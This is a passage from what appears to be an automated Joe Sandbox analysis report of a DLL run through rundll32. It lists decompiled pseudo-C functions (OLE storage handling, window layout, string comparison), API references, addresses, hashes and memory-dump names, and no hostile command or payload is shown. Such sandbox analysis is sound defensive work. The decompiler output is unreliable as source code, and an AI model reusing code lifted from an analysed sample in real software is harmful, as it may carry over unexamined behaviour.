                                                                                                            0x1001852f
                                                                                                            0x10018530
                                                                                                            0x10018539
                                                                                                            0x1001853d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001853f
                                                                                                            0x00000000
                                                                                                            0x1001853f
                                                                                                            0x1001852d
                                                                                                            0x100184e2

                                                                                                            APIs
                                                                                                            • GetStringTypeW.KERNEL32(00000001,10042704,00000001,?,10042730,0000001C,1001294D,00000001,00000020,00000100,?,00000000), ref: 10018461
                                                                                                            • GetLastError.KERNEL32 ref: 10018473
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,00000000,10012C1E,00000000,00000000,10042730,0000001C,1001294D,00000001,00000020,00000100,?,00000000), ref: 100184D5
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,00000000,10012C1E,?,00000000), ref: 10018553
                                                                                                            • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,00000000), ref: 10018565
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiStringTypeWide$ErrorLast
                                                                                                            • String ID: @Mv@hvpYv
                                                                                                            • API String ID: 3581945363-4125583295
                                                                                                            • Opcode ID: c5b59c8c516efa9e1f4051a0dd57c54a1c21c008c676a274ba4cfa4b85049daa
                                                                                                            • Instruction ID: 357f909d61fdf3067703904fdff93fde9d84214a81f0f6dffe892fe1b28005b1
                                                                                                            • Opcode Fuzzy Hash: c5b59c8c516efa9e1f4051a0dd57c54a1c21c008c676a274ba4cfa4b85049daa
                                                                                                            • Instruction Fuzzy Hash: D2418071900629ABEB12CF60CC85A9E3BA6FF497A0F114108F810EE191D735DF91DBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000B89E Relevance: 12.3, APIs: 8, Instructions: 303memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 71%
                                                                                                            			E1000B89E(intOrPtr __ecx) {
				void* _t115;
				intOrPtr _t119;
				intOrPtr* _t120;
				void* _t121;
				intOrPtr* _t122;
				intOrPtr* _t124;
				intOrPtr* _t126;
				void _t128;
				intOrPtr* _t130;
				long _t133;
				void* _t134;
				void* _t135;
				void* _t136;
				void _t138;
				void _t140;
				void* _t142;
				void* _t143;
				void* _t146;
				void* _t147;
				void _t148;
				void* _t150;
				intOrPtr* _t152;
				void* _t153;
				void _t157;
				void* _t158;
				void _t160;
				intOrPtr* _t162;
				void* _t167;
				intOrPtr* _t169;
				intOrPtr* _t171;
				intOrPtr* _t173;
				void* _t174;
				intOrPtr* _t176;
				intOrPtr _t187;
				intOrPtr* _t207;
				void* _t211;
				void* _t226;
				void* _t227;
				void* _t228;

				E10011BF0(0x1003aeb1, _t228);
				_t176 = __ecx + 0x4c;
				 *((intOrPtr*)(_t228 - 0x20)) = __ecx;
				_t115 = E1000A2B0(__ecx,  *((intOrPtr*)(_t228 + 8)), 0, 3, 0x10043068, _t176,  *(_t228 + 0x14));
				 *(_t228 + 0x14) = _t115;
				if(_t115 < 0) {
					L51:
					 *[fs:0x0] =  *((intOrPtr*)(_t228 - 0xc));
					return _t115;
				}
				 *(_t228 - 0x10) = 0;
				 *(_t228 - 0x14) = 0;
				 *((intOrPtr*)(_t228 + 8)) = 0;
				E1000A4B6(__ecx, __ecx + 0x3c);
				_t119 =  *((intOrPtr*)( *((intOrPtr*)(__ecx)) + 0xc0))();
				 *((intOrPtr*)(_t228 - 0x24)) = _t119;
				if(_t119 != 0) {
					L4:
					_t226 =  *(_t228 + 0xc);
					if(_t226 == 0) {
						__eflags =  *(_t228 + 0x10);
						if( *(_t228 + 0x10) != 0) {
							L15:
							_t120 =  *_t176;
							_t211 = _t228 - 0x14;
							_t121 =  *((intOrPtr*)( *_t120))(_t120, 0x100430e8, _t211);
							__eflags = _t121;
							if(_t121 < 0) {
								L42:
								if( *(_t228 + 0x14) >= 0) {
									L45:
									_t122 =  *((intOrPtr*)(_t228 + 8));
									if(_t122 != 0) {
										 *((intOrPtr*)( *_t122 + 8))(_t122);
									}
									if( *((intOrPtr*)(_t228 - 0x24)) != 0 &&  *(_t228 + 0x14) >= 0) {
										 *(_t228 + 0x14) = 1;
									}
									_t115 =  *(_t228 + 0x14);
									goto L51;
								}
								L43:
								_t124 =  *_t176;
								if(_t124 != 0) {
									 *((intOrPtr*)( *_t124 + 0x18))(_t124, 1);
									_t126 =  *_t176;
									 *((intOrPtr*)( *_t126 + 8))(_t126);
									 *_t176 = 0;
								}
								goto L45;
							}
							__eflags = _t226;
							if(_t226 != 0) {
								__eflags =  *(_t228 + 0x10);
								if( *(_t228 + 0x10) == 0) {
									 *(_t228 + 0x14) = 0x8000ffff;
									L36:
									_t128 =  *(_t228 - 0x14);
									L37:
									 *((intOrPtr*)( *_t128 + 8))(_t128);
									L38:
									if( *(_t228 + 0x14) < 0) {
										goto L43;
									}
									if( *((intOrPtr*)(_t228 - 0x24)) == 0) {
										_t187 =  *((intOrPtr*)(_t228 - 0x20));
										if(( *(_t187 + 0x6e) & 0x00000002) == 0) {
											_t130 =  *_t176;
											 *(_t228 + 0x14) =  *((intOrPtr*)( *_t130 + 0xc))(_t130, _t187 + 0xc4);
										}
									}
									goto L42;
								}
								_t133 =  *((intOrPtr*)( *_t226 + 0x30))();
								__eflags = _t211;
								 *(_t228 - 0x2c) = _t133;
								if(__eflags > 0) {
									L29:
									 *(_t228 + 0x14) = 0x8007000e;
									 *(_t228 + 0x10) = 0;
									L30:
									__eflags =  *(_t228 + 0x10);
									 *(_t228 - 0x1c) = 0;
									if( *(_t228 + 0x10) == 0) {
										goto L36;
									}
									_t134 = _t228 - 0x1c;
									__imp__CreateILockBytesOnHGlobal( *(_t228 + 0x10), 1, _t134);
									__eflags = _t134;
									 *(_t228 + 0x14) = _t134;
									if(_t134 < 0) {
										goto L36;
									}
									_t135 = _t228 - 0x18;
									 *(_t228 - 0x18) = 0;
									__imp__StgOpenStorageOnILockBytes( *(_t228 - 0x1c), 0, 0x12, 0, 0, _t135);
									__eflags = _t135;
									 *(_t228 + 0x14) = _t135;
									if(_t135 >= 0) {
										_t138 =  *(_t228 - 0x14);
										 *(_t228 + 0x14) =  *((intOrPtr*)( *_t138 + 0x18))(_t138,  *(_t228 - 0x18));
										_t140 =  *(_t228 - 0x18);
										 *((intOrPtr*)( *_t140 + 8))(_t140);
									}
									_t136 =  *(_t228 - 0x1c);
									L21:
									 *((intOrPtr*)( *_t136 + 8))(_t136);
									goto L36;
								}
								if(__eflags < 0) {
									L26:
									_t142 = GlobalAlloc(0, _t133);
									__eflags = _t142;
									 *(_t228 + 0x10) = _t142;
									if(_t142 == 0) {
										goto L29;
									}
									_t143 = GlobalLock(_t142);
									__eflags = _t143;
									if(_t143 == 0) {
										goto L29;
									}
									 *((intOrPtr*)( *_t226 + 0x34))(_t143,  *(_t228 - 0x2c));
									GlobalUnlock( *(_t228 + 0x10));
									goto L30;
								}
								__eflags = _t133 - 0xffffffff;
								if(_t133 >= 0xffffffff) {
									goto L29;
								}
								goto L26;
							}
							_t146 = _t228 + 0xc;
							 *(_t228 + 0xc) = 0;
							__imp__CreateILockBytesOnHGlobal(0, 1, _t146);
							__eflags = _t146;
							 *(_t228 + 0x14) = _t146;
							if(_t146 < 0) {
								goto L36;
							}
							_t147 = _t228 + 0x10;
							 *(_t228 + 0x10) = 0;
							__imp__StgCreateDocfileOnILockBytes( *(_t228 + 0xc), 0x1012, 0, _t147);
							__eflags = _t147;
							 *(_t228 + 0x14) = _t147;
							if(_t147 >= 0) {
								_t148 =  *(_t228 - 0x14);
								 *(_t228 + 0x14) =  *((intOrPtr*)( *_t148 + 0x14))(_t148,  *(_t228 + 0x10));
								_t150 =  *(_t228 + 0x10);
								 *((intOrPtr*)( *_t150 + 8))(_t150);
							}
							_t136 =  *(_t228 + 0xc);
							goto L21;
						}
						L10:
						_t152 =  *_t176;
						_t214 = _t228 - 0x10;
						_t153 =  *((intOrPtr*)( *_t152))(_t152, 0x10043188, _t228 - 0x10);
						__eflags = _t153;
						if(_t153 < 0) {
							goto L15;
						} else {
							__eflags = _t226;
							if(__eflags != 0) {
								E1002A986(_t228 - 0x74, _t214, __eflags);
								 *(_t228 - 4) = 0;
								E1001D6AF(_t228 - 0x2c, _t228 - 0x74);
								_t157 =  *(_t228 - 0x10);
								_t158 =  *((intOrPtr*)( *_t157 + 0x14))(_t157, _t228 - 0x2c, _t226, 1, 0x1000, 0);
								_t46 = _t228 - 4;
								 *_t46 =  *(_t228 - 4) | 0xffffffff;
								__eflags =  *_t46;
								 *(_t228 + 0x14) = _t158;
								E1002A941(_t228 - 0x74, _t228 - 0x2c);
							} else {
								_t160 =  *(_t228 - 0x10);
								 *(_t228 + 0x14) =  *((intOrPtr*)( *_t160 + 0x20))(_t160);
							}
							_t128 =  *(_t228 - 0x10);
							goto L37;
						}
					}
					if( *(_t228 + 0x10) != 0) {
						goto L15;
					}
					_t162 =  *_t176;
					_push(_t228 + 8);
					_push(0x10043198);
					_push(_t162);
					if( *((intOrPtr*)( *_t162))() < 0) {
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(3);
					if( *((intOrPtr*)( *_t226 + 0x50))() == 0) {
						goto L10;
					} else {
						 *(_t228 + 0x10) = 0;
						_t167 =  *((intOrPtr*)( *_t226 + 0x50))(0, 0xffffffff, _t228 + 0x10, _t228 + 0xc);
						_t207 =  *((intOrPtr*)(_t228 + 8));
						 *(_t228 + 0x14) =  *((intOrPtr*)( *_t207 + 0x14))(_t207,  *(_t228 + 0x10), _t167);
						_t169 =  *((intOrPtr*)(_t228 + 8));
						 *((intOrPtr*)( *_t169 + 8))(_t169);
						 *((intOrPtr*)(_t228 + 8)) = 0;
						goto L38;
					}
				}
				_t171 =  *_t176;
				_t227 = __ecx + 0x6c;
				 *((intOrPtr*)( *_t171 + 0x58))(_t171, 1, _t227);
				if(( *(_t227 + 2) & 0x00000002) == 0) {
					goto L4;
				}
				_t173 =  *_t176;
				_t174 =  *((intOrPtr*)( *_t173 + 0xc))(_t173,  *((intOrPtr*)(_t228 - 0x20)) + 0xc4);
				 *(_t228 + 0x14) = _t174;
				if(_t174 < 0) {
					goto L43;
				}
				goto L4;
			}










































                                                                                                            0x1000b8a3
                                                                                                            0x1000b8b3
                                                                                                            0x1000b8c4
                                                                                                            0x1000b8c7
                                                                                                            0x1000b8ce
                                                                                                            0x1000b8d1
                                                                                                            0x1000bba5
                                                                                                            0x1000bbab
                                                                                                            0x1000bbb3
                                                                                                            0x1000bbb3
                                                                                                            0x1000b8dd
                                                                                                            0x1000b8e0
                                                                                                            0x1000b8e3
                                                                                                            0x1000b8e6
                                                                                                            0x1000b8ef
                                                                                                            0x1000b8f7
                                                                                                            0x1000b8fa
                                                                                                            0x1000b92d
                                                                                                            0x1000b92d
                                                                                                            0x1000b932
                                                                                                            0x1000b997
                                                                                                            0x1000b99a
                                                                                                            0x1000ba06
                                                                                                            0x1000ba06
                                                                                                            0x1000ba0a
                                                                                                            0x1000ba14
                                                                                                            0x1000ba16
                                                                                                            0x1000ba18
                                                                                                            0x1000bb67
                                                                                                            0x1000bb6a
                                                                                                            0x1000bb84
                                                                                                            0x1000bb84
                                                                                                            0x1000bb89
                                                                                                            0x1000bb8e
                                                                                                            0x1000bb8e
                                                                                                            0x1000bb94
                                                                                                            0x1000bb9b
                                                                                                            0x1000bb9b
                                                                                                            0x1000bba2
                                                                                                            0x00000000
                                                                                                            0x1000bba2
                                                                                                            0x1000bb6c
                                                                                                            0x1000bb6c
                                                                                                            0x1000bb70
                                                                                                            0x1000bb77
                                                                                                            0x1000bb7a
                                                                                                            0x1000bb7f
                                                                                                            0x1000bb82
                                                                                                            0x1000bb82
                                                                                                            0x00000000
                                                                                                            0x1000bb70
                                                                                                            0x1000ba1e
                                                                                                            0x1000ba20
                                                                                                            0x1000ba80
                                                                                                            0x1000ba83
                                                                                                            0x1000bb32
                                                                                                            0x1000bb39
                                                                                                            0x1000bb39
                                                                                                            0x1000bb3c
                                                                                                            0x1000bb3f
                                                                                                            0x1000bb42
                                                                                                            0x1000bb45
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000bb4a
                                                                                                            0x1000bb4c
                                                                                                            0x1000bb53
                                                                                                            0x1000bb55
                                                                                                            0x1000bb64
                                                                                                            0x1000bb64
                                                                                                            0x1000bb53
                                                                                                            0x00000000
                                                                                                            0x1000bb4a
                                                                                                            0x1000ba8d
                                                                                                            0x1000ba90
                                                                                                            0x1000ba92
                                                                                                            0x1000ba95
                                                                                                            0x1000bace
                                                                                                            0x1000bace
                                                                                                            0x1000bad5
                                                                                                            0x1000bad8
                                                                                                            0x1000bad8
                                                                                                            0x1000badb
                                                                                                            0x1000bade
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000bae0
                                                                                                            0x1000bae9
                                                                                                            0x1000baef
                                                                                                            0x1000baf1
                                                                                                            0x1000baf4
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000baf6
                                                                                                            0x1000bb02
                                                                                                            0x1000bb05
                                                                                                            0x1000bb0b
                                                                                                            0x1000bb0d
                                                                                                            0x1000bb10
                                                                                                            0x1000bb12
                                                                                                            0x1000bb1e
                                                                                                            0x1000bb21
                                                                                                            0x1000bb27
                                                                                                            0x1000bb27
                                                                                                            0x1000bb2a
                                                                                                            0x1000ba75
                                                                                                            0x1000ba78
                                                                                                            0x00000000
                                                                                                            0x1000ba78
                                                                                                            0x1000ba97
                                                                                                            0x1000ba9e
                                                                                                            0x1000baa0
                                                                                                            0x1000baa6
                                                                                                            0x1000baa8
                                                                                                            0x1000baab
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000baae
                                                                                                            0x1000bab4
                                                                                                            0x1000bab6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000bac0
                                                                                                            0x1000bac6
                                                                                                            0x00000000
                                                                                                            0x1000bac6
                                                                                                            0x1000ba99
                                                                                                            0x1000ba9c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000ba9c
                                                                                                            0x1000ba22
                                                                                                            0x1000ba29
                                                                                                            0x1000ba2c
                                                                                                            0x1000ba32
                                                                                                            0x1000ba34
                                                                                                            0x1000ba37
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000ba3d
                                                                                                            0x1000ba4a
                                                                                                            0x1000ba4d
                                                                                                            0x1000ba53
                                                                                                            0x1000ba55
                                                                                                            0x1000ba58
                                                                                                            0x1000ba5a
                                                                                                            0x1000ba66
                                                                                                            0x1000ba69
                                                                                                            0x1000ba6f
                                                                                                            0x1000ba6f
                                                                                                            0x1000ba72
                                                                                                            0x00000000
                                                                                                            0x1000ba72
                                                                                                            0x1000b99c
                                                                                                            0x1000b99c
                                                                                                            0x1000b9a0
                                                                                                            0x1000b9aa
                                                                                                            0x1000b9ac
                                                                                                            0x1000b9ae
                                                                                                            0x00000000
                                                                                                            0x1000b9b0
                                                                                                            0x1000b9b0
                                                                                                            0x1000b9b2
                                                                                                            0x1000b9ce
                                                                                                            0x1000b9da
                                                                                                            0x1000b9dd
                                                                                                            0x1000b9e2
                                                                                                            0x1000b9ec
                                                                                                            0x1000b9ef
                                                                                                            0x1000b9ef
                                                                                                            0x1000b9ef
                                                                                                            0x1000b9f6
                                                                                                            0x1000b9f9
                                                                                                            0x1000b9b4
                                                                                                            0x1000b9b4
                                                                                                            0x1000b9bd
                                                                                                            0x1000b9bd
                                                                                                            0x1000b9fe
                                                                                                            0x00000000
                                                                                                            0x1000b9fe
                                                                                                            0x1000b9ae
                                                                                                            0x1000b937
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000b93d
                                                                                                            0x1000b944
                                                                                                            0x1000b945
                                                                                                            0x1000b94a
                                                                                                            0x1000b94f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000b953
                                                                                                            0x1000b954
                                                                                                            0x1000b955
                                                                                                            0x1000b956
                                                                                                            0x1000b95f
                                                                                                            0x00000000
                                                                                                            0x1000b961
                                                                                                            0x1000b970
                                                                                                            0x1000b973
                                                                                                            0x1000b976
                                                                                                            0x1000b983
                                                                                                            0x1000b986
                                                                                                            0x1000b98c
                                                                                                            0x1000b98f
                                                                                                            0x00000000
                                                                                                            0x1000b98f
                                                                                                            0x1000b95f
                                                                                                            0x1000b8fc
                                                                                                            0x1000b900
                                                                                                            0x1000b907
                                                                                                            0x1000b90e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000b913
                                                                                                            0x1000b91f
                                                                                                            0x1000b924
                                                                                                            0x1000b927
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 1000B8A3
                                                                                                              • Part of subcall function 1000A2B0: CoGetClassObject.OLE32(?,?,00000000,100430A8,?), ref: 1000A2D0
                                                                                                              • Part of subcall function 1002A986: __EH_prolog.LIBCMT ref: 1002A98B
                                                                                                              • Part of subcall function 1002A941: __EH_prolog.LIBCMT ref: 1002A946
                                                                                                            • CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 1000BA2C
                                                                                                            • StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 1000BA4D
                                                                                                            • GlobalAlloc.KERNEL32(00000000,00000000), ref: 1000BAA0
                                                                                                            • GlobalLock.KERNEL32 ref: 1000BAAE
                                                                                                            • GlobalUnlock.KERNEL32(?), ref: 1000BAC6
                                                                                                            • CreateILockBytesOnHGlobal.OLE32(?,00000001,?), ref: 1000BAE9
                                                                                                            • StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,?), ref: 1000BB05
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: GlobalLock$Bytes$CreateH_prolog$AllocClassDocfileObjectOpenStorageUnlock
                                                                                                            • String ID:
                                                                                                            • API String ID: 645133905-0
                                                                                                            • Opcode ID: 185fddf691f165cf246ba28c1c06a3726dabc5333d542278f897f997fcb1b7b0
                                                                                                            • Instruction ID: 4fa0019427ba4cc32ee59eeb07c1e68fe65e84f71fb64a57669587eeb3e16f8a
                                                                                                            • Opcode Fuzzy Hash: 185fddf691f165cf246ba28c1c06a3726dabc5333d542278f897f997fcb1b7b0
                                                                                                            • Instruction Fuzzy Hash: 73C16A70A0064AEFDB11CF64C888DAEBBB9FF89780B204559F941EB265C771DD41CB61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10022499 Relevance: 12.1, APIs: 8, Instructions: 124windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 87%
                                                                                                            			E10022499(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, signed char _a17, struct tagRECT* _a20, signed int _a24, intOrPtr _a28) {
				int _v8;
				intOrPtr _v12;
				int _v16;
				int _v20;
				struct tagRECT _v36;
				void* _v40;
				void* __ebp;
				signed int _t61;
				int _t62;
				signed short _t63;
				void* _t64;
				void* _t72;
				intOrPtr* _t85;
				signed int _t87;
				struct HWND__* _t91;
				void* _t92;

				_t72 = __ecx;
				_v8 = 0;
				_v12 = _a28;
				_v16 = 0;
				_v20 = 0;
				if(_a24 == 0) {
					GetClientRect( *(__ecx + 0x1c),  &_v36);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				_t61 = _a16 & 0xffff7fff;
				_a24 = _t61;
				if(_t61 == 1) {
					_v40 = _v40 & 0x00000000;
				} else {
					_v40 = BeginDeferWindowPos(8);
				}
				_t62 = GetTopWindow( *(_t72 + 0x1c));
				while(1) {
					_t91 = _t62;
					if(_t91 == 0) {
						break;
					}
					_t63 = GetDlgCtrlID(_t91);
					_push(_t91);
					_t87 = _t63 & 0x0000ffff;
					_t64 = E10022115();
					if(_t87 != _a12) {
						if(_t87 >= _a4 && _t87 <= _a8 && _t64 != 0) {
							SendMessageA(_t91, 0x361, 0,  &_v40);
						}
					} else {
						_v8 = _t91;
					}
					_t62 = GetWindow(_t91, 2);
				}
				if(_a24 != 1) {
					if(_a12 != 0 && _v8 != 0) {
						_t62 = E100220EE(_t92, _v8);
						if(_a24 == 2) {
							_t85 = _a20;
							_v36.left = _v36.left +  *_t85;
							_v36.top = _v36.top +  *((intOrPtr*)(_t85 + 4));
							_v36.right = _v36.right -  *((intOrPtr*)(_t85 + 8));
							_v36.bottom = _v36.bottom -  *((intOrPtr*)(_t85 + 0xc));
						}
						if((_a17 & 0x00000080) == 0) {
							 *((intOrPtr*)( *_t62 + 0x68))( &_v36, 0);
							_t62 = E10020D81( &_v40, _v8,  &_v36);
						}
					}
					if(_v40 != 0) {
						_t62 = EndDeferWindowPos(_v40);
					}
				} else {
					if(_a28 == 0) {
						_t62 = _a20;
						 *((intOrPtr*)(_t62 + 8)) = _v20;
						 *((intOrPtr*)(_t62 + 4)) = 0;
						 *_t62 = 0;
						 *((intOrPtr*)(_t62 + 0xc)) = _v16;
					} else {
						_t62 = CopyRect(_a20,  &_v36);
					}
				}
				return _t62;
			}



















                                                                                                            0x100224a8
                                                                                                            0x100224ae
                                                                                                            0x100224b1
                                                                                                            0x100224b4
                                                                                                            0x100224b7
                                                                                                            0x100224ba
                                                                                                            0x100224cc
                                                                                                            0x100224bc
                                                                                                            0x100224bf
                                                                                                            0x100224c0
                                                                                                            0x100224c1
                                                                                                            0x100224c2
                                                                                                            0x100224c2
                                                                                                            0x100224d5
                                                                                                            0x100224dd
                                                                                                            0x100224e0
                                                                                                            0x100224ef
                                                                                                            0x100224e2
                                                                                                            0x100224ea
                                                                                                            0x100224ea
                                                                                                            0x100224f6
                                                                                                            0x10022542
                                                                                                            0x10022542
                                                                                                            0x10022546
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10022501
                                                                                                            0x10022507
                                                                                                            0x10022508
                                                                                                            0x1002250b
                                                                                                            0x10022513
                                                                                                            0x1002251d
                                                                                                            0x10022533
                                                                                                            0x10022533
                                                                                                            0x10022515
                                                                                                            0x10022515
                                                                                                            0x10022515
                                                                                                            0x1002253c
                                                                                                            0x1002253c
                                                                                                            0x1002254c
                                                                                                            0x1002257b
                                                                                                            0x10022585
                                                                                                            0x1002258e
                                                                                                            0x10022590
                                                                                                            0x10022595
                                                                                                            0x1002259b
                                                                                                            0x100225a1
                                                                                                            0x100225a7
                                                                                                            0x100225a7
                                                                                                            0x100225ae
                                                                                                            0x100225b9
                                                                                                            0x100225c7
                                                                                                            0x100225c7
                                                                                                            0x100225ae
                                                                                                            0x100225cf
                                                                                                            0x100225d4
                                                                                                            0x100225d4
                                                                                                            0x1002254e
                                                                                                            0x10022551
                                                                                                            0x10022562
                                                                                                            0x10022568
                                                                                                            0x1002256e
                                                                                                            0x10022571
                                                                                                            0x10022573
                                                                                                            0x10022553
                                                                                                            0x1002255a
                                                                                                            0x1002255a
                                                                                                            0x10022551
                                                                                                            0x100225de

                                                                                                            APIs
                                                                                                            • GetClientRect.USER32 ref: 100224CC
                                                                                                            • BeginDeferWindowPos.USER32 ref: 100224E4
                                                                                                            • GetTopWindow.USER32(?), ref: 100224F6
                                                                                                            • GetDlgCtrlID.USER32 ref: 10022501
                                                                                                            • SendMessageA.USER32(00000000,00000361,00000000,00000000), ref: 10022533
                                                                                                            • GetWindow.USER32(00000000,00000002), ref: 1002253C
                                                                                                            • CopyRect.USER32 ref: 1002255A
                                                                                                            • EndDeferWindowPos.USER32(00000000), ref: 100225D4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$DeferRect$BeginClientCopyCtrlMessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 1228040700-0
                                                                                                            • Opcode ID: 42fbaed3706ff63598f5f0fcd2255645fe957362c4a3063a48a191e489ec859f
                                                                                                            • Instruction ID: a778dc46a9958f4d0915ef63e23ed223fa2105f0a807d6ecff0719afcf2b0a04
                                                                                                            • Opcode Fuzzy Hash: 42fbaed3706ff63598f5f0fcd2255645fe957362c4a3063a48a191e489ec859f
                                                                                                            • Instruction Fuzzy Hash: D741477190062AEFCF11DFD4E8A49EEB7B5FF08340B51816AF905A7251C734AA50CFA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1002535C Relevance: 12.1, APIs: 8, Instructions: 81stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1002535C(void* __ebx, void* __edi, void* __esi, char* _a4, CHAR* _a8) {
				intOrPtr _v8;
				short _v528;
				short _v1048;
				short _v1568;
				intOrPtr _t18;
				int _t20;
				int _t21;
				void* _t23;
				char* _t32;
				int _t37;
				char* _t42;
				void* _t47;
				void* _t49;

				_t18 =  *0x1004c470; // 0x6edecb8c
				_t42 = _a4;
				_v8 = _t18;
				if(lstrcmpiA(_t42, _a8) == 0) {
					_t20 = GetSystemMetrics(0x2a);
					if(_t20 != 0) {
						_t21 = lstrlenA(_t42);
						if(_t21 != lstrlenA(_a8)) {
							L13:
							_t23 = 0;
						} else {
							_t37 = GetThreadLocale();
							GetStringTypeA(_t37, 1, _t42, 0xffffffff,  &_v528);
							GetStringTypeA(_t37, 4, _t42, 0xffffffff,  &_v1048);
							GetStringTypeA(_t37, 1, _a8, 0xffffffff,  &_v1568);
							_t32 = _t42;
							if( *_t42 == 0) {
								L10:
								_t23 = 1;
							} else {
								_t47 = 0;
								while(( *(_t49 + _t47 - 0x414) & 0x00000080) == 0 ||  *((intOrPtr*)(_t49 + _t47 - 0x20c)) ==  *((intOrPtr*)(_t49 + _t47 - 0x61c))) {
									_t47 = _t47 + 2;
									if( *_t32 != 0) {
										continue;
									} else {
										goto L10;
									}
									goto L11;
								}
								goto L13;
							}
						}
						L11:
					} else {
						_t23 = _t20 + 1;
					}
				} else {
					_t23 = 0;
				}
				return E100117AE(_t23, _v8);
			}
















                                                                                                            0x10025365
                                                                                                            0x1002536e
                                                                                                            0x10025372
                                                                                                            0x1002537d
                                                                                                            0x10025388
                                                                                                            0x10025390
                                                                                                            0x100253a1
                                                                                                            0x100253ac
                                                                                                            0x10025434
                                                                                                            0x10025434
                                                                                                            0x100253b2
                                                                                                            0x100253be
                                                                                                            0x100253cd
                                                                                                            0x100253dc
                                                                                                            0x100253ed
                                                                                                            0x100253f2
                                                                                                            0x100253f4
                                                                                                            0x10025422
                                                                                                            0x10025424
                                                                                                            0x100253f6
                                                                                                            0x100253f6
                                                                                                            0x100253f8
                                                                                                            0x10025416
                                                                                                            0x10025420
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10025420
                                                                                                            0x00000000
                                                                                                            0x100253f8
                                                                                                            0x100253f4
                                                                                                            0x10025425
                                                                                                            0x10025392
                                                                                                            0x10025392
                                                                                                            0x10025392
                                                                                                            0x1002537f
                                                                                                            0x1002537f
                                                                                                            0x1002537f
                                                                                                            0x10025431

                                                                                                            APIs
                                                                                                            • lstrcmpiA.KERNEL32(?,00000000), ref: 10025375
